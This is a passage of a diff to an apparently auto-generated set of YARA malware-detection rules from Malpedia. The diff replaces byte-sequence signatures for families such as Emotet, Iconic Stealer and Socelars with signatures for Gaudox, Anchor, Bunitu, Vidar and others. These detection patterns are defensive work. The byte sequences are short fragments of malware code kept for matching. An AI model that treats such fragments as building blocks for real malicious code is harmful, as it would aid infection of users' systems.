-		$sequence_3 = { c705????????ba514000 c705????????00020000 68fe000000 68???????? ffd6 83c408 68ff000000 }
-		$sequence_4 = { 68ac000000 68???????? e8???????? e8???????? }
-		$sequence_5 = { 68ff000000 68ac000000 68???????? e8???????? e8???????? 68ff000000 68ac000000 }
-		$sequence_6 = { ac 30c8 aa 4a 75f9 61 c9 }
-		$sequence_7 = { 68fe000000 68???????? e8???????? 68fe000000 }
-		$sequence_8 = { 68fe000000 68???????? e8???????? e8???????? 68ff000000 68fe000000 }
-		$sequence_9 = { 31c8 e8???????? 68ac000000 68???????? }
+		$sequence_0 = { 8b450c 8b4d10 56 57 8b7d08 8d95dcfbffff }
+		$sequence_1 = { a1???????? 8b0d???????? 8b15???????? 8985a8f9ffff }
+		$sequence_2 = { ffd2 8b8594f9ffff 50 ff15???????? }
+		$sequence_3 = { 4d 4d 0b0c0d0e0f1011 1213 1415 }
+		$sequence_4 = { 7407 c6854feeffff01 6a14 ff15???????? 6890000000 ffd3 }
+		$sequence_5 = { 83c414 8d45c8 48 8a4801 40 }
+		$sequence_6 = { 881438 46 47 ebd7 8b8dd8fbffff }
+		$sequence_7 = { 8d55ec 52 b902000000 56 8945f0 66894dec ff15???????? }
+		$sequence_8 = { 4d 4d 0b0c0d0e0f1011 1213 1415 16 17 }
+		$sequence_9 = { 8bc6 c1f805 8b048500c44100 83e61f c1e606 8d443004 }
 
 	condition:
-		7 of them and filesize < 43008
+		7 of them and filesize < 425984
 }
-rule MALPEDIA_Win_Emotet_Auto : FILE
+rule MALPEDIA_Win_Gaudox_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "590db82a-e64b-59fe-a363-cd344fccdc7b"
+		id = "e48a9725-6218-5ef6-9a1a-6786debab3b4"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.emotet"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.emotet_auto.yar#L1-L618"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.gaudox"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.gaudox_auto.yar#L1-L131"
 		license_url = "N/A"
-		logic_hash = "9ea1f202fdf175311dcb11b7b6f7efdcd86b6e87b055de16a61627e022c993b1"
+		logic_hash = "cc9ffbe1e9e9b635f7f04ba1adabaa59f1b5b2df83ed09fa49e4be99cd0578aa"
 		score = 75
-		quality = 50
+		quality = 75
 		tags = "FILE"
 		version = "1"
 		tool = "yara-signator v0.6.0"
@@ -137189,99 +136846,34 @@ rule MALPEDIA_Win_Emotet_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 3c41 7c04 3c5a 7e03 c60158 }
-		$sequence_1 = { 3c61 7c04 3c7a 7e0b 3c41 }
-		$sequence_2 = { 8a01 3c30 7c04 3c39 7e13 3c61 }
-		$sequence_3 = { 7e03 c60158 41 803900 }
-		$sequence_4 = { 3903 5f 5e 0f95c0 5b 8be5 }
-		$sequence_5 = { 83c020 eb03 0fb7c0 69d23f000100 }
-		$sequence_6 = { 880a 8bc1 c1e808 8d5204 }
-		$sequence_7 = { c1e910 8842fd 884afe c1e908 }
-		$sequence_8 = { 75f2 eb06 33c9 66894802 }
-		$sequence_9 = { c1e808 8d5204 c1e910 8842fd }
-		$sequence_10 = { 8d5801 f6c30f 7406 83e3f0 }
-		$sequence_11 = { 8b16 8945fc 8d45f8 6a04 }
-		$sequence_12 = { 0faf4510 50 6a08 ff15???????? }
-		$sequence_13 = { 8901 8b477c 85c0 7448 }
-		$sequence_14 = { 8b4508 894dcc 8d4dc8 8945c8 8975d4 }
-		$sequence_15 = { 7448 8b00 2b878c000000 56 }
-		$sequence_16 = { 894630 8b45f8 01460c 294610 }
-		$sequence_17 = { 50 8d45f8 81ca00000020 50 52 }
-		$sequence_18 = { 48894808 48895010 4c894018 4c894820 c3 }
-		$sequence_19 = { 488bd3 488bcf 488b5c2460 4883c450 }
-		$sequence_20 = { 0fb7c1 c1e910 66c1e808 4d8d4004 }
-		$sequence_21 = { 418bd0 d3e2 418bcb d3e0 03d0 }
-		$sequence_22 = { d3e7 83f841 7208 83f85a }
-		$sequence_23 = { 4803c8 eb08 803900 7408 }
-		$sequence_24 = { 2bca d1e9 03ca c1e906 894d18 }
-		$sequence_25 = { 4d8d4004 418840fd 418848fe 66c1e908 418848ff 4d3bd9 72cf }
-		$sequence_26 = { 483bd8 730b 488bcb e8???????? }
-		$sequence_27 = { c1e807 41 83f87f 77f7 }
-		$sequence_28 = { f7e1 b84fecc44e 2bca d1e9 }
-		$sequence_29 = { 84c0 75f2 eb03 c60100 }
-		$sequence_30 = { 8bd3 8b0f e8???????? 85c0 }
-		$sequence_31 = { 83c104 894e04 8b00 85c0 }
-		$sequence_32 = { 7907 83c107 3bf7 72e8 }
-		$sequence_33 = { 0fb6c0 668942fa c1e910 0fb6c1 }
-		$sequence_34 = { 56 57 6a1e 8d45e0 }
-		$sequence_35 = { 52 52 52 52 68???????? 52 }
-		$sequence_36 = { 83ec48 53 56 57 6a44 }
-		$sequence_37 = { 83f87f 760d 8d642400 c1e807 }
-		$sequence_38 = { 83f87f 7609 c1e807 41 }
-		$sequence_39 = { 50 6a00 6a01 6a00 ff15???????? a3???????? }
-		$sequence_40 = { 6a00 6aff 50 51 ff15???????? }
-		$sequence_41 = { 50 6a00 ff75fc 6800040000 }
-		$sequence_42 = { 50 56 6800800000 6a6a }
-		$sequence_43 = { 53 56 8bf1 bb00c34c84 }
-		$sequence_44 = { 83ec08 56 68400000f0 6a18 33f6 56 56 }
-		$sequence_45 = { ff75fc 6800040000 6a00 6a00 6a00 }
-		$sequence_46 = { 8bec 83ec08 56 57 8bf1 33ff }
-		$sequence_47 = { 83ec10 53 6a00 8d45fc }
-		$sequence_48 = { 8bf1 bb00c34c84 57 33ff }
-		$sequence_49 = { 8b7d08 83fe00 8945f0 894dec 8955e8 8975e4 }
-		$sequence_50 = { 6a03 6a00 6a00 ff7508 53 50 }
-		$sequence_51 = { 56 57 00b807000000 008b45fc33d2 00b871800780 00558b ec }
-		$sequence_52 = { 8b55f4 01ca 89d6 83c60c 8b7df4 8b4c0f0c 83f900 }
-		$sequence_53 = { 56 8b4510 8b4d0c 8b5508 befbffffff c600e8 }
-		$sequence_54 = { 51 8d4df8 51 ff75f8 50 6a03 }
-		$sequence_55 = { 39c7 0f97c7 08fb f6c301 89f0 8945a4 }
-		$sequence_56 = { 8b466c 5f 5e 5b 8be5 5d }
-		$sequence_57 = { 8b7020 8b7840 89c3 83c33c }
-		$sequence_58 = { 31f6 89720c 897208 897204 }
-		$sequence_59 = { 7519 33c9 0f1f4000 0fb6840c30010000 }
-		$sequence_60 = { ff15???????? 83f803 7405 83f802 751e }
-		$sequence_61 = { 743e 8b5c2430 85db 741d }
-		$sequence_62 = { 31c9 89e2 31f6 89720c }
-		$sequence_63 = { 33d2 c605????????00 0fb6d8 e8???????? }
-		$sequence_64 = { 8bf8 e8???????? eb04 8b7c2430 }
-		$sequence_65 = { e8???????? 84c0 7519 33c9 }
-		$sequence_66 = { 81fecd000000 7740 0fb6b62043e601 ff24b50443e601 884801 80ca04 }
-		$sequence_67 = { e9???????? 8b84248c000000 f20f10842490000000 31c9 }
-		$sequence_68 = { 89e8 894c247c 8b8c2480000000 01c8 83c1c0 }
-		$sequence_69 = { 744b 488d15583f0000 488bc8 e8???????? 4885c0 742f }
-		$sequence_70 = { 488b43f8 4c8d4be0 4889442428 8b03 498d55ff 4c8d05ce3f0000 89442420 }
-		$sequence_71 = { c744240400000000 8954240c e8???????? 8d0d2231d800 890424 }
-		$sequence_72 = { 53 57 56 83ec44 8b442454 8d0d5830d800 }
-		$sequence_73 = { dd5c2450 f20f10442450 8b442444 8b4838 }
-		$sequence_74 = { 8bcc 8bd0 895c2420 e8???????? 44 8bc3 48 }
+		$sequence_0 = { 5f 5e 8be5 5d c20400 8b7c240c 8d44244c }
+		$sequence_1 = { 50 e8???????? a1???????? 8bb858010000 83ff20 772c 68???????? }
+		$sequence_2 = { 745c 85d2 7458 56 8b7508 85f6 }
+		$sequence_3 = { 660f7f842460030000 660f7f842470030000 660f7f842480030000 f3ab b982000000 89842460060000 }
+		$sequence_4 = { 8b4708 2bca 83c0fb 03c1 894201 8d45c4 }
+		$sequence_5 = { 8bc1 b9???????? 50 e8???????? 8b4c2440 8bc1 803900 }
+		$sequence_6 = { 8d8548feffff 50 e8???????? a1???????? 8bb888010000 83ff1c 7731 }
+		$sequence_7 = { 0f88ce000000 8b15???????? b8???????? ff7750 8b7c2450 2bc2 8944245c }
+		$sequence_8 = { 6a01 e8???????? 8b55fc 8bc8 8b45f4 890c82 85c9 }
+		$sequence_9 = { 731a 8bd1 b9???????? e8???????? 85c0 0f88a7000000 8b74240c }
 
 	condition:
-		7 of them and filesize < 733184
+		7 of them and filesize < 155648
 }
-rule MALPEDIA_Win_Abcsync_Auto : FILE
+rule MALPEDIA_Win_Anchor_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "02af896d-ede7-5659-a477-3d4aaff1c995"
+		id = "bb15263f-399c-5701-ae36-ae60623792e3"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.abcsync"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.abcsync_auto.yar#L1-L128"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.anchor"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.anchor_auto.yar#L1-L210"
 		license_url = "N/A"
-		logic_hash = "1265b61a325fe240ea536a84f366a66df81cfa15aa46380fd4f4b2886a744626"
+		logic_hash = "00f136c31d3ac19e1483ba5e1be1e038dd18c931fe522c85d8ea96a7f9411021"
 		score = 75
-		quality = 75
+		quality = 73
 		tags = "FILE"
 		version = "1"
 		tool = "yara-signator v0.6.0"
@@ -137293,32 +136885,44 @@ rule MALPEDIA_Win_Abcsync_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 488b15???????? 41be2c010000 33c9 458bc6 ff15???????? 488b15???????? 4533e4 }
-		$sequence_1 = { 8d4108 410fb64c1a07 4898 422a0c18 b81f85eb51 }
-		$sequence_2 = { ba01000000 85c9 7e13 8bc1 0f1f840000000000 c1e204 }
-		$sequence_3 = { 4c63c2 488bcb 33d2 e8???????? 8b542454 418bfc 4c8b35???????? }
-		$sequence_4 = { 488d4c2420 c74424205c595f6a c74424245c653601 e8???????? 488905???????? 488b4c2428 }
-		$sequence_5 = { 2bc8 8d411c 4898 420fb60c18 410fb7441a36 662bc1 418d491d }
-		$sequence_6 = { 488d057d3b0100 488945e0 895128 488d0d17950000 488b45d8 488908 488d0d69200100 }
-		$sequence_7 = { 75d4 0f1101 498bd1 0f114110 0f114120 0f114130 0f114140 }
-		$sequence_8 = { 03d0 6bc232 2bc8 8d4116 420fb64c13fb 4898 422a0c18 }
-		$sequence_9 = { 2bc8 8d4121 420fb64c13fe 4898 422a0c18 }
+		$sequence_0 = { c6400365 eb0a 66c74001646c c640036c }
+		$sequence_1 = { 740c 66c740016578 c6400365 eb0a }
+		$sequence_2 = { 8bf8 f7e6 0f90c1 f7d9 0bc8 51 e8???????? }
+		$sequence_3 = { c1e102 51 6a00 50 a3???????? e8???????? }
+		$sequence_4 = { b001 5d c3 e9???????? 6a0c 68???????? e8???????? }
+		$sequence_5 = { 66894818 33c9 8b4608 6689581a 8b4608 5b }
+		$sequence_6 = { 33c9 8b461c 6689781a 8b461c 5f }
+		$sequence_7 = { 50 56 e8???????? 83bde8feffff10 8d85d4feffff }
+		$sequence_8 = { b101 e8???????? e8???????? 84c0 }
+		$sequence_9 = { 0bc1 4898 488d0d12920200 488b5528 }
+		$sequence_10 = { 4889842440140000 488bd9 4c63d2 498bc2 418be9 48c1f806 488d0db8020100 }
+		$sequence_11 = { 03c2 c1f802 6bc003 894504 }
+		$sequence_12 = { 034524 3b8520010000 760c c785f400000001000000 }
+		$sequence_13 = { 4881e9c0000000 48c1e108 4803c8 8bc1 488d9405bf090000 eb0c 8bc7 }
+		$sequence_14 = { 0bc1 488b4d48 8801 488b4548 }
+		$sequence_15 = { 03c8 8bc1 8985a4000000 488d8da8010000 }
+		$sequence_16 = { 498bcf e8???????? 498bc7 488b8d90000000 }
+		$sequence_17 = { 7ce8 488b4350 4903d1 b945000000 66890c50 }
+		$sequence_18 = { 488bfa 7203 488b3a ba20000000 488bcf e8???????? 33db }
+		$sequence_19 = { 00040f 830905 0000 83bd641a0000ff }
+		$sequence_20 = { 05e0930400 894544 8b5544 488b4508 }
+		$sequence_21 = { 0000 83bd641a0000ff 0f85fc040000 c6859412000000 }
 
 	condition:
-		7 of them and filesize < 348160
+		7 of them and filesize < 778240
 }
-rule MALPEDIA_Win_Iconic_Stealer_Auto : FILE
+rule MALPEDIA_Win_Bunitu_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "7673e219-b974-5ee5-b8e5-79ce461f9ab7"
+		id = "ad5c884d-40cc-596d-af5c-643847feb65b"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.iconic_stealer"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.iconic_stealer_auto.yar#L1-L134"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.bunitu"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.bunitu_auto.yar#L1-L120"
 		license_url = "N/A"
-		logic_hash = "5bc33a8c1cdbea6882940424bec9a55b2f154b2fa412fc3e5ed34989f79a9444"
+		logic_hash = "4579187f29545393632699d1b30240f12e5e7855e0bb344d18579a744895ea25"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -137332,32 +136936,32 @@ rule MALPEDIA_Win_Iconic_Stealer_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { ebc9 4885f6 740f ba68000000 488bce e8???????? eb0a }
-		$sequence_1 = { 498b4a18 8b4148 034144 7912 458bc6 498bd2 e8???????? }
-		$sequence_2 = { ff8bdc000000 c687c500000003 40387367 7407 c7473407000000 b805000000 394734 }
-		$sequence_3 = { e9???????? f7430400000001 488b0e 4489642454 48894c2468 4c896598 0fb64164 }
-		$sequence_4 = { e9???????? 41f7450400000100 0f8480020000 4889bc2458010000 498b3e 4c396648 7414 }
-		$sequence_5 = { e8???????? 488be8 4885c0 0f849d020000 80783f02 0f8493020000 488b542438 }
-		$sequence_6 = { ff15???????? 85c0 0f8494000000 39bc2480000000 0f8487000000 498bd6 4c8d1d8d6c0300 }
-		$sequence_7 = { b8e08004e0 48094330 44896374 4c89a378020000 4c89a370020000 4c89a380020000 4c89a330020000 }
-		$sequence_8 = { 744d 4c8bc1 eb48 4c8d442440 4889742440 488d150c780300 4489742448 }
-		$sequence_9 = { 4d85c0 741a 410fb74010 6685c0 7f05 6603c8 eb0b }
+		$sequence_0 = { c70003000000 ff75f0 8f4004 ff75ec 8f4008 8bc8 }
+		$sequence_1 = { ff15???????? 59 5d 5a }
+		$sequence_2 = { 6a00 50 ff15???????? 6a00 68e8030000 ff15???????? 33c0 }
+		$sequence_3 = { aa 5a 5f 5e 42 5b }
+		$sequence_4 = { 6800000100 50 51 6800080000 6a00 }
+		$sequence_5 = { 8b85d8feffff 898538fdffff 6a10 8d8d34fdffff 51 ffb528fdffff ff15???????? }
+		$sequence_6 = { 668b85dcfeffff b901190000 49 663bc1 }
+		$sequence_7 = { 50 53 8d85caf7ffff 50 e8???????? }
+		$sequence_8 = { 837df000 7614 6a02 ff75f0 ff15???????? ff75f0 }
+		$sequence_9 = { 8dbd58feffff b91c000000 33c0 f3aa e8???????? 8945fc }
 
 	condition:
-		7 of them and filesize < 2401280
+		7 of them and filesize < 221184
 }
-rule MALPEDIA_Win_Slothfulmedia_Auto : FILE
+rule MALPEDIA_Win_Ziyangrat_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "12866e57-5c22-5ece-ab6b-edebb824500e"
+		id = "ad05acb3-2122-508e-96e1-44a0677aa226"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.slothfulmedia"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.slothfulmedia_auto.yar#L1-L175"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.ziyangrat"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.ziyangrat_auto.yar#L1-L126"
 		license_url = "N/A"
-		logic_hash = "8cdce0e96c9b360c003407b809360fea7e440aeaa30b884d65090695657af8b0"
+		logic_hash = "89f077d6fe657db2420d0ceec203b172ff92ec6b640db30714a01b0a429a9ae6"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -137371,38 +136975,32 @@ rule MALPEDIA_Win_Slothfulmedia_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 8365f000 837d1400 53 56 57 0f86a0000000 8b5d10 }
-		$sequence_1 = { 68df3d7a6b 50 e8???????? 57 ff15???????? 57 }
-		$sequence_2 = { d1f8 8b45fc 7505 b8???????? 50 57 }
-		$sequence_3 = { 397df4 0f8640ffffff 8b4508 e8???????? cc 55 8bec }
-		$sequence_4 = { 33c0 eb17 57 ff750c }
-		$sequence_5 = { ff7320 6a00 6a00 ffb33c020000 ff15???????? 8945f8 }
-		$sequence_6 = { ff7514 56 ff15???????? 56 ff15???????? 8b4508 eb02 }
-		$sequence_7 = { 1bd2 83daff 85d2 7422 83f805 761f }
-		$sequence_8 = { ff15???????? 8b8c2410020000 5f 5e 33cc }
-		$sequence_9 = { 6689442414 e8???????? 83c40c 6a00 ff15???????? 8b35???????? 8b3d???????? }
-		$sequence_10 = { 83c40c 6804010000 8d44240c 50 6a00 }
-		$sequence_11 = { 85c0 7507 ffd7 83f805 74ee 6804010000 }
-		$sequence_12 = { 8b35???????? 8b3d???????? 90 68???????? ffd6 85c0 }
-		$sequence_13 = { 8d4c2410 51 ff15???????? 8b8c2410020000 }
-		$sequence_14 = { e8???????? 81c40c020000 c21000 3b0d???????? 7502 }
-		$sequence_15 = { 6804010000 8d54240c 6a00 52 e8???????? 83c40c }
+		$sequence_0 = { 33c0 8dbc2421140000 889c2420140000 f3ab }
+		$sequence_1 = { 50 ff15???????? 85c0 751d ff15???????? 50 56 }
+		$sequence_2 = { 7560 55 6800040000 ff15???????? 55 8d842468010000 }
+		$sequence_3 = { 0f841b010000 81fe4c4f0000 0f87e6000000 8b4c2424 8d542414 83e110 }
+		$sequence_4 = { 33c0 8d7c2409 8bb4240c040000 f3ab 66ab 56 6a00 }
+		$sequence_5 = { 7e95 ffd5 8bf0 89742430 }
+		$sequence_6 = { 83f810 0f85a6000000 8b7304 81fe00500000 0f8f97000000 85f6 0f8c8f000000 }
+		$sequence_7 = { 33c0 8dbc2411010000 889c2410010000 f3ab 66ab aa b91f000000 }
+		$sequence_8 = { 8db424c0190000 f2ae f7d1 49 bf???????? 8bd1 c1e902 }
+		$sequence_9 = { 50 c68424fb00000061 c68424fc00000074 c68424fd00000061 889c24fe000000 c684240801000053 c684240901000079 }
 
 	condition:
-		7 of them and filesize < 122880
+		7 of them and filesize < 188416
 }
-rule MALPEDIA_Win_Socelars_Auto : FILE
+rule MALPEDIA_Win_Pwnpos_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "3509baee-4e8c-59b5-b156-e68f4beae715"
+		id = "1f880853-80ef-5ec2-a31a-31cd2006dc43"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.socelars"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.socelars_auto.yar#L1-L134"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.pwnpos"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.pwnpos_auto.yar#L1-L127"
 		license_url = "N/A"
-		logic_hash = "a3ac10f2bb04512e9390a5496d935cded9fb0eddb2b0634c3c4f320efa071722"
+		logic_hash = "145bb3fa97da57220c104891d855f912aebbcf21962d1405b1589dc2cce60605"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -137416,32 +137014,32 @@ rule MALPEDIA_Win_Socelars_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 8b8b88000000 394830 7f1c 8b542430 8bcb 6a00 52 }
-		$sequence_1 = { 8b432c 035514 40 837d1800 89432c 8b4f04 894c2424 }
-		$sequence_2 = { e8???????? 83c40c 894590 8b4d90 51 8d4d98 e8???????? }
-		$sequence_3 = { 8b55b8 83c202 3b5524 7735 8b4520 0345b8 0fbe08 }
-		$sequence_4 = { e8???????? c745fc00000000 8b5510 2b550c 8955d4 837dd400 766d }
-		$sequence_5 = { ff15???????? 83c404 8b4e68 85c9 7414 0fb7868c000000 3bf8 }
-		$sequence_6 = { ffd0 83c404 85c0 7417 b80a000000 5f 5e }
-		$sequence_7 = { ff75f4 03c6 89461c ff712c 50 e8???????? 8b4dfc }
-		$sequence_8 = { e9???????? 83cbff 8b4db8 83790400 0f8579ffffff c745a000000000 c7410401000000 }
-		$sequence_9 = { 8b7c2448 99 03f8 13ca 83c70a 897c2448 83d100 }
+		$sequence_0 = { 68???????? bb0b000000 52 899c2468020000 e8???????? 83c40c }
+		$sequence_1 = { 8b07 8b4004 3974380c 750f 8b44383c 3bc6 7407 }
+		$sequence_2 = { 8bf0 33db 83c404 3bf3 742d 8d4e18 c7460401000000 }
+		$sequence_3 = { 8d4df0 e8???????? 8b4d0c 895dfc 8b5f30 51 c745ec01000000 }
+		$sequence_4 = { 51 53 56 52 50 8d4c243c 51 }
+		$sequence_5 = { 8b4d08 83c118 e9???????? 8b4d08 83c118 e9???????? }
+		$sequence_6 = { 720f 8b95a0f9ffff 52 e8???????? 83c404 b001 8b4df4 }
+		$sequence_7 = { 57 57 57 57 57 8d85d8f9ffff 50 }
+		$sequence_8 = { c705????????80b24300 c3 c705????????80b24300 c3 }
+		$sequence_9 = { 0f871c020000 ff248dc86f4300 8d48cf 80f908 7706 }
 
 	condition:
-		7 of them and filesize < 2151424
+		7 of them and filesize < 638976
 }
-rule MALPEDIA_Win_Croxloader_Auto : FILE
+rule MALPEDIA_Win_Protonbot_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "74969832-3646-5c22-9967-7e8cb3d178d9"
+		id = "2a60cbb5-df76-51a1-aa18-1e35bc0d84b0"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.croxloader"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.croxloader_auto.yar#L1-L124"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.protonbot"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.protonbot_auto.yar#L1-L123"
 		license_url = "N/A"
-		logic_hash = "5587745f089fbff18eabf5b798d40f2503c06a9701158cb607e6e154e3ca0b65"
+		logic_hash = "dd56b01eb6c4f05df12eaa91d84ffe14ac197bb00fbf288295bd9f5385f33352"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -137455,34 +137053,34 @@ rule MALPEDIA_Win_Croxloader_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 488d4e18 41b801010000 e8???????? 418bc6 4d8d4d10 4c8d3d901d0100 }
-		$sequence_1 = { 4156 4157 488b05???????? 4d8bf8 448bf2 8bf1 4885c0 }
-		$sequence_2 = { 498bce ff15???????? 488bd8 eb02 33db 4c8d358d93ffff 4885db }
-		$sequence_3 = { 48c7c1ffffffff ff15???????? 488bbc2480030000 488b8c2460030000 }
-		$sequence_4 = { 4c8d052aad0000 488bf9 488d1528ad0000 b904000000 e8???????? 8bd3 488bcf }
-		$sequence_5 = { 4883ec20 448bf9 4c8d356e94ffff 4d8be1 }
-		$sequence_6 = { 48895c2408 57 4883ec20 488d1d5f290100 488d3d58290100 eb12 488b03 }
-		$sequence_7 = { 33db 4c8d358d93ffff 4885db 750d }
-		$sequence_8 = { 410f42d0 6bdb21 0fb6d2 03da 48ffc0 ebd6 8bc8 }
-		$sequence_9 = { 803d????????00 754c 488d0db41e0100 48890d???????? 488d05661b0100 488d0d8f1d0100 488905???????? }
+		$sequence_0 = { ff15???????? ffb5f4feffff ff15???????? 8d8dfcfeffff }
+		$sequence_1 = { ffd3 85ff 8bbdf4fffeff 7f8d 5e }
+		$sequence_2 = { 51 52 8d8da4feffff e8???????? 6a00 6aff 6a00 }
+		$sequence_3 = { 83bda0feffff10 8d8d8cfeffff 56 0f438d8cfeffff 6a00 51 6a00 }
+		$sequence_4 = { 6a00 8b18 899df8fffeff e8???????? 83c410 }
+		$sequence_5 = { ff7508 e8???????? 83c410 5d c3 6a1c b8???????? }
+		$sequence_6 = { 57 50 8d45f4 64a300000000 8d8dbcfeffff e8???????? }
+		$sequence_7 = { 837e1410 8955a0 8bc6 7202 8b06 8d1438 8b45a0 }
+		$sequence_8 = { e8???????? 83c418 c645fc01 8d85bcfeffff }
+		$sequence_9 = { ff15???????? 56 85c0 7404 ffd7 eb02 ffd3 }
 
 	condition:
-		7 of them and filesize < 241664
+		7 of them and filesize < 1073152
 }
-rule MALPEDIA_Win_Final1Stspy_Auto : FILE
+rule MALPEDIA_Win_Vidar_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "6b262f1e-6f1a-5a41-853b-26929c3926c7"
+		id = "a2b64f61-0adb-5b11-ad23-70455bcfca7c"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.final1stspy"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.final1stspy_auto.yar#L1-L120"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.vidar"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.vidar_auto.yar#L1-L603"
 		license_url = "N/A"
-		logic_hash = "2890f444efdd6c719c6ff20f4502542398a3dec68f7c2fb262ec6568139d72d6"
+		logic_hash = "33908c4a5b34fe0467be14ef9b31f306540934b8f5c348e181dd6ed65da6d436"
 		score = 75
-		quality = 75
+		quality = 50
 		tags = "FILE"
 		version = "1"
 		tool = "yara-signator v0.6.0"
@@ -137494,32 +137092,93 @@ rule MALPEDIA_Win_Final1Stspy_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 80c27a 80f219 881439 41 3bce 7cef 8bc7 }
-		$sequence_1 = { 8bd6 0f281d???????? 2bd0 0f10040f 0f28ca 660ffcc2 }
-		$sequence_2 = { 8a4803 c1e206 80f93d 7508 47 83ff03 }
-		$sequence_3 = { 5d c3 2d???????? 78b0 03d0 8b45fc 8a4803 }
-		$sequence_4 = { 7508 47 83ff03 7d3e }
-		$sequence_5 = { 7410 8a11 8acb 3aca }
-		$sequence_6 = { 81e7ff070080 7908 4f 81cf00f8ffff }
-		$sequence_7 = { 81cf00f8ffff 47 33f6 85ff 7e0a e8???????? }
-		$sequence_8 = { 84db 7410 8a11 8acb 3aca 7425 8a4801 }
-		$sequence_9 = { c3 2d???????? 78dc 8b55fc b9???????? }
+		$sequence_0 = { 25ff7f0000 c3 e8???????? 8b486c }
+		$sequence_1 = { 7202 8b00 8d8d68fdffff 51 50 }
+		$sequence_2 = { 8b8648af0100 c1e803 038644af0100 5e 5d c3 }
+		$sequence_3 = { 56 8b742408 8b865caf0100 57 }
+		$sequence_4 = { 8b7508 33ff 89b55cfdffff 89bd60fdffff 8d450c }
+		$sequence_5 = { e8???????? d9450c 51 8d8d58ffffff d91c24 }
+		$sequence_6 = { 8b7508 33db 895dd0 c746140f000000 895e10 8975cc }
+		$sequence_7 = { d9e0 d99d00ffffff d98500ffffff d91c24 }
+		$sequence_8 = { 740a b800000500 e9???????? 57 }
+		$sequence_9 = { 5f c6043300 8bc6 5e 5b c20400 }
+		$sequence_10 = { 895dfc e8???????? 83781408 c645fc01 }
+		$sequence_11 = { b800020000 e9???????? 8b4dc8 33c0 }
+		$sequence_12 = { 5e c20400 ff742408 e8???????? 59 83f8ff }
